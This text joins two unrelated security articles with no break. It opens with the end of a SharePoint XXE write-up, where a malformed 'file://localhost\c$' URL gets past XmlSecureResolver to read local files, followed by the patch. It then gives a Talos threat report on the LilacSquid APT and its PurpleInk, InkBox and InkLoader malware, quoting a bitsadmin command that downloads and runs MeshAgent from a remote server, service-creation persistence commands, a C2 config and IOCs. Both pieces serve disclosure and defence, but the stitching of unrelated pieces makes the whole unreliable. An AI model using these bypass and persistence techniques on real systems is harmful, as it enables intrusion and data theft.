SPXmlDataSource will successfully retrieve our XML. What about XmlSecureResolver? Unfortunately, such a path (without a protocol) will lead to a very restrictive policy, which does not allow us to leverage this XXE.

It made me wonder about the URL parsing. I knew that I could not abuse the HTTP-based XmlUrlDataSource and SoapDataSource. The code was written in C# and was pretty straightforward to read – URL parsing looked good there. On the other hand, the URL parsing in SPXmlDataSource is performed by unmanaged code, which cannot be easily decompiled and read.

I started thinking about the following potential exploitation scenario:
       • Deliver a “malformed” URL.
       • SPXmlDataSource somehow manages to handle this URL and retrieves my uploaded XML successfully.
       • The URL gives me an unrestricted XmlSecureResolver policy, and I’m able to fully exploit the XXE.

This idea seemed good, and I decided to investigate the possibilities. First, we have to figure out when XmlSecureResolver gives us a nice policy, which allows us to:
       • Access a local file system (to read file contents).
       • Perform HTTP communication to any server (to exfiltrate data).

Let’s deliver the following URL to XmlSecureResolver:

       file://localhost/c$/whatever

Bingo! XmlSecureResolver creates a policy with no restrictions! It thinks that we are loading the XML from the local file system, which means that we probably already have full access, and we can do anything we want.

Such a URL is not something that we should be able to deliver to SPXmlDataSource or any other data source that we have available. None of them is based on the local file system, and even if they were, we would not be able to upload files there.

Still, we don’t know how SPXmlDataSource is handling URLs. Maybe my dream attack scenario with a malformed URL is possible? Before even trying to reverse the appropriate function, I started playing around with this SharePoint data source, and surprisingly, I found a solution quickly:

       file://localhost\c$/sites/mysite/test.xml

Let’s see how SPXmlDataSource handles it (based on my observations):

Figure 4 SPXmlDataSource - handling of malformed URL

This is awesome. Such a URL allows us to retrieve the XML that we can freely upload to SharePoint. On the other hand, it gives us an unrestricted access policy in XmlSecureResolver! This URL parsing confusion between those two components gives us the ability to fully exploit the XXE and perform a file read.

The entire attack scenario looks like this:

Figure 5 SharePoint XXE - entire exploitation scenario

Demo

Let’s have a look at the demo, to visualize things better. It presents the full exploitation process, together with the debugger attached. You can see that:
       • SPXmlDataSource fetches the malicious XML file, even though the URL is malformed.
       • XmlSecureResolver creates an unrestricted access policy.
       • XXE is exploited and we retrieve the win.ini file.
       • “DTD prohibited” exception is eventually thrown, but we were still able to abuse the OOB XXE.

The Patch

The patch from Microsoft implemented two main changes:
       • More URL parsing controls for SPXmlDataSource.
       • The XmlTextReader object now also prohibits DTD usage (previously, only XmlReaderSettings did that).

In general, I find .NET XXE-protection settings way trickier than the ones that you can define in various Java parsers. This is because you can apply them to objects of different types (here: XmlReaderSettings versus XmlTextReader). When XmlTextReader prohibits the DTD usage, parameter entities seem to never be resolved, even with the resolver specified (that’s how this patch works). On the other hand, when XmlReaderSettings prohibits DTDs, parameter entities are resolved when the XmlUrlResolver is used. You can easily get confused here.

Summary

A lot of us thought that XXE vulnerabilities were almost dead in .NET. Still, it seems that you may sometimes spot some tricky implementations and corner cases that may turn out to be vulnerable. A careful review of .NET XXE-related settings is not an easy task (they are tricky) but may eventually be worth a shot.

I hope you liked this writeup. I have a huge line of upcoming blog posts, but vulnerabilities are waiting for the patches (including one more SharePoint vulnerability). Until my next post, you can follow me @chudypb and follow the team on Twitter, Mastodon, LinkedIn, or Instagram for the latest in exploit techniques and security patches.

LilacSquid: The stealthy trilogy of PurpleInk, InkBox and InkLoader


By Anna Bennett, Nicole Hoffman, Asheer Malhotra, Sean Taylor and Brandon White. 

  • Cisco Talos is disclosing a new suspected data theft campaign, active since at least 2021, that we attribute to an advanced persistent threat (APT) actor we’re calling “LilacSquid.”  
  • LilacSquid’s victimology includes a diverse set of victims: information technology organizations building software for the research and industrial sectors in the United States, organizations in the energy sector in Europe, and the pharmaceutical sector in Asia, indicating that the threat actor (TA) may be agnostic of industry verticals and trying to steal data from a variety of sources.  
  • This campaign uses MeshAgent, an open-source remote management tool, and a customized version of QuasarRAT we’re calling “PurpleInk” to serve as the primary implants after successfully compromising vulnerable application servers exposed to the internet.  
  • This campaign leverages vulnerabilities in public-facing application servers and compromised remote desktop protocol (RDP) credentials to orchestrate the deployment of a variety of open-source tools, such as MeshAgent and SSF, alongside customized malware, such as "PurpleInk," and two malware loaders we are calling "InkBox" and "InkLoader.”  
  • The campaign is geared toward establishing long-term access to compromised victim organizations to enable LilacSquid to siphon data of interest to attacker-controlled servers. 

LilacSquid – An espionage-motivated threat actor 

Talos assesses with high confidence that this campaign has been active since at least 2021 and the successful compromise and post-compromise activities are geared toward establishing long-term access for data theft by an advanced persistent threat (APT) actor we are tracking as "LilacSquid" and UAT-4820. Talos has observed at least three successful compromises spanning entities in Asia, Europe and the United States consisting of industry verticals such as pharmaceuticals, oil and gas, and technology. 

Previous intrusions into software manufacturers, such as the 3CX and X_Trader compromises by Lazarus, indicate that unauthorized long-term access to organizations that manufacture and distribute popular software for enterprise and industrial organizations can open avenues of supply chain compromise proving advantageous to threat actors such as LilacSquid, allowing them to widen their net of targets.  

We have observed two different types of initial access techniques deployed by LilacSquid, including exploiting vulnerabilities and the use of compromised remote desktop protocol (RDP) credentials. Post-exploitation activity in this campaign consists of the deployment of MeshAgent, an open-source remote management and desktop session application, and a heavily customized version of QuasarRAT that we track as “PurpleInk” allowing LilacSquid to gain complete control over the infected systems. Additional means of persistence used by LilacSquid include the use of open-source tools such as Secure Socket Funneling (SSF), which is a tool for proxying and tunneling multiple sockets through a single secure TLS tunnel to a remote computer. 

It is worth noting that multiple tactics, techniques, tools and procedures (TTPs) utilized in this campaign bear some overlap with North Korean APT groups, such as Andariel and its parent umbrella group, Lazarus. Public reporting has noted Andariel’s use of MeshAgent as a tool for maintaining post-compromise access after successful exploitation. Furthermore, Talos has observed Lazarus extensively use SOCKS proxy and tunneling tools, along with custom-made malware, as part of their post-compromise playbooks to act as channels of secondary access and exfiltration. This tactic has also been seen in this campaign operated by LilacSquid, where the threat actor deployed SSF along with other malware to create tunnels to their remote servers. 

LilacSquid’s infection chains 

There are primarily two types of infection chains that LilacSquid uses in this campaign. The first involves the successful exploitation of a vulnerable web application, while the other is the use of compromised RDP credentials. Successful compromise of a system leads to LilacSquid deploying multiple vehicles of access onto compromised hosts, including dual-use tools such as MeshAgent, Secure Socket Funneling (SSF), InkLoader and PurpleInk. 

Successful exploitation of the vulnerable application results in the attackers deploying a script that will set up working directories for the malware and then download and execute MeshAgent from a remote server. On execution, MeshAgent will connect to its C2, carry out preliminary reconnaissance and begin downloading and activating other implants on the system, such as SSF and PurpleInk. 

MeshAgent is typically downloaded by the attackers using the bitsadmin utility and then executed to establish contact with the C2: 

bitsadmin /transfer -job_name- /download /priority normal -remote_URL- -local_path_for_MeshAgent-
-local_path_for_MeshAgent- connect 

Instrumenting InkLoader – Modularizing the infection chain 

When compromised RDP credentials were used to gain access, the infection chain was altered slightly: LilacSquid chose either to deploy MeshAgent and subsequent implants, or to introduce another component into the infection chain preceding PurpleInk.  

InkLoader is a simple yet effective .NET-based malware loader, written to run a hardcoded executable or command. In this infection chain, InkLoader is the component that persists across reboots on the infected host, rather than the actual malware it runs. So far, we have only seen PurpleInk being executed via InkLoader, but LilacSquid will likely use InkLoader to deploy additional malware implants. 

Talos observed LilacSquid deploy InkLoader in conjunction with PurpleInk only when they could successfully create and maintain remote desktop protocol (RDP) sessions on the target host using stolen credentials. A successful login via RDP leads to the download of InkLoader and PurpleInk, the copying of these artifacts into the desired directories on disk, and the registration of InkLoader as a service, which is then started to run InkLoader and, in turn, PurpleInk. The infection chain can be visualized as: 

[Figure: InkLoader-based infection chain.]

Service creation and execution on the endpoint is typically done via the command line interface using the commands: 

sc create TransactExDetect displayname=Extended Transaction Detection binPath= _filepath_of_InkLoader_ start= auto 
sc description TransactExDetect Extended Transaction Detection for Active Directory domain hosts 
sc start TransactExDetect 

PurpleInk – LilacSquid's bespoke implant 

PurpleInk, LilacSquid’s primary implant of choice, has been adapted from QuasarRAT, a popular remote access trojan family. Although QuasarRAT has been available to threat actors since at least 2014, we observed PurpleInk being actively developed starting in 2021 and continuing to evolve its functionality separately from its parent malware family.  

PurpleInk uses an accompanying configuration file to obtain information such as the C2 server’s address and port. This file is typically base64-decoded and decrypted to obtain the configuration strings required by PurpleInk. 
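
A minimal sketch of that recovery flow follows; the report does not name the cipher, so the decrypt step is a placeholder rather than PurpleInk’s actual routine, and the helper name is ours.

```python
import base64
from typing import Callable

def load_config(path: str, decrypt_fn: Callable[[bytes], bytes]) -> list[str]:
    """Recover config strings: base64-decode, then decrypt (cipher unknown)."""
    with open(path, "rb") as f:
        blob = base64.b64decode(f.read())       # step 1: base64-decode
    plaintext = decrypt_fn(blob)                # step 2: placeholder decryption
    return plaintext.decode().splitlines()      # e.g. C2 address and port
```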

PurpleInk is a highly versatile implant that is heavily obfuscated and contains a variety of RAT capabilities. Talos has observed multiple variants of PurpleInk where functionalities have both been introduced and removed. 

In terms of RAT capabilities, PurpleInk can perform the following actions on the infected host: 

  • Enumerate processes and send the process ID, name and associated window title to the C2. 
  • Terminate a process ID (PID) specified by the C2 on the infected host. 
  • Run a new application on the host – start process. 
  • Get drive information for the infected host, such as volume labels, root directory names, drive type and drive format. 
  • Enumerate a given directory to obtain underlying directory names, file names and file sizes. 
  • Read a file specified by the C2 and exfiltrate its contents. 
  • Replace or append content to a specified file. 
  • Gather system information about the infected host using WMI queries. Information includes:  

  • Processor name – SELECT * FROM Win32_Processor 
  • Memory (RAM) size in MB – SELECT * FROM Win32_ComputerSystem | TotalPhysicalMemory 
  • Video card (GPU) – SELECT * FROM Win32_DisplayConfiguration | Description 
  • Username – current username 
  • Computer name – infected host’s name 
  • Domain name – domain of the infected host 
  • Host name – NetBIOS host name 
  • System drive – root system drive 
  • System directory – system directory of the infected host 
  • Computer uptime – calculated from the current time and SELECT * FROM Win32_OperatingSystem WHERE Primary='true' | LastBootUpTime 
  • MAC address – by enumerating network interfaces on the endpoint 
  • LAN IP address – by enumerating network interfaces on the endpoint 
  • WAN IP address – not retrieved or calculated; an empty string is sent to the C2 
  • Antivirus software name – not calculated; defaults to “NoInfo” 
  • Firewall – not calculated; defaults to “NoInfo” 
  • Time zone – not calculated; an empty string is sent to the C2 
  • Country – not calculated; an empty string is sent to the C2 
  • ISP – not calculated; an empty string is sent to the C2 

  • Start a remote shell on the infected host using ‘cmd[.]exe /K’. 
  • Rename or move directories and files and then enumerate them. 
  • Delete files and directories specified by the C2. 
  • Connect to a remote address specified by the C2. This remote address, referenced internally as a “Friend,” is a reverse proxy host, indicating that PurpleInk can act as an intermediary proxy tool. 
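
Returning to the WMI lookups in the list above, the same queries are easy to reproduce for triage or detection testing. This sketch uses the third-party wmi package on Windows; the package choice is ours for illustration, as the implant itself is .NET-based.

```python
import wmi  # third-party package: pip install wmi (Windows only)

c = wmi.WMI()
for cpu in c.Win32_Processor():          # SELECT * FROM Win32_Processor
    print("Processor:", cpu.Name)
for cs in c.Win32_ComputerSystem():      # TotalPhysicalMemory field
    print("RAM (MB):", int(cs.TotalPhysicalMemory) // (1024 * 1024))
```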

PurpleInk has the following capabilities related to communicating with its “friends” (proxy servers): 

  • Connect to a new friend whose remote address is specified by the C2. 
  • Send data to a new or existing friend. 
  • Disconnect from a specified friend. 
  • Receive data from another connected friend and process it. 

Another PurpleInk variant, built and deployed in 2023 and 2024, has limited functionality, with much of its capability stripped out. The capabilities that remain in this variant are the abilities to: 

  • Close all connections to proxy servers. 
  • Create a reverse shell.  
  • Connect and send/receive data from connected proxies. 

Functionalities such as file management, execution and gathering system information have been stripped out of this variant of PurpleInk, but they can be supplemented by the reverse shell carried over from previous variants, which can be used to carry out these tasks on the infected endpoint. Adversaries frequently strip, add and stitch together functionalities to reduce their implant’s footprint on the infected system to avoid detection, or to streamline their implementations by removing redundant capabilities.  

InkBox – Custom loader observed in older attacks 

InkBox is a malware loader that reads from a hardcoded file path on disk and decrypts its contents. The decrypted content is another executable assembly that is run by invoking its entry point within the InkBox process. This second assembly is the PurpleInk backdoor. The overall infection chain in this case is: 

[Figure: InkBox-based infection chain.]

The use of InkBox to deploy PurpleInk is an older technique that LilacSquid has employed since 2021. Since 2023, the threat actor has modularized the infection chain so that PurpleInk runs as a separate process. However, even in this new infection chain, PurpleInk is still run via another component, which we call “InkLoader.”  

LilacSquid employs MeshAgent 

In this campaign, LilacSquid has extensively used MeshAgent as the first stage of its post-compromise activity. MeshAgent is the agent/client component of MeshCentral, an open-source remote device management platform. MeshAgent binaries typically use a configuration file known as an MSH file. The MSH files in this campaign contain information such as the MeshName (a victim identifier in this case) and C2 addresses: 

MeshName=-Name_of_mesh- 
MeshType=-Type_of_mesh- 
MeshID=0x-Mesh_ID_hex- 
ServerID=-Server_ID_hex- 
MeshServer=wss://-Mesh_C2_Address-
Translation=-keywords_translation_JSON-

Being a remote device management utility, MeshAgent allows an operator to control almost all aspects of the device via the MeshCentral server, providing capabilities such as: 

  • List all devices in the Mesh (list of victims). 
  • View and control desktop. 
  • Manage files on the system. 
  • View software and hardware information about the device.  

Post-exploitation, MeshAgent activates other dual-use and malicious tools on the infected systems, such as SSF and PurpleInk.  

Coverage 

Ways our customers can detect and block this threat are listed below. 


Cisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware detailed in this post. Try Secure Endpoint for free here.   

Cisco Secure Web Appliance web scanning prevents access to malicious websites and detects malware used in these attacks.  

Cisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of their campaign. You can try Secure Email for free here.  

Cisco Secure Firewall (formerly Next-Generation Firewall and Firepower NGFW) appliances such as Threat Defense Virtual, Adaptive Security Appliance and Meraki MX can detect malicious activity associated with this threat.  

Cisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco Secure products.  

Umbrella, Cisco's secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and URLs, whether users are on or off the corporate network. Sign up for a free trial of Umbrella here.  

Cisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites and tests suspicious sites before users access them.  

Additional protections with context for your specific environment and threat data are available from the Firewall Management Center.  

Cisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your network. 

Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.  

The following Snort SIDs have been released to detect this threat: 63511 - 63514, 300920 - 300921.

IOCs

IOCs for this research can also be found at our GitHub repository here. 

PurpleInk 

2eb9c6722139e821c2fe8314b356880be70f3d19d8d2ba530adc9f466ffc67d8 

Network IOCs 

67[.]213[.]221[.]6 

192[.]145[.]127[.]190 

45[.]9[.]251[.]14 

199[.]229[.]250[.]142 
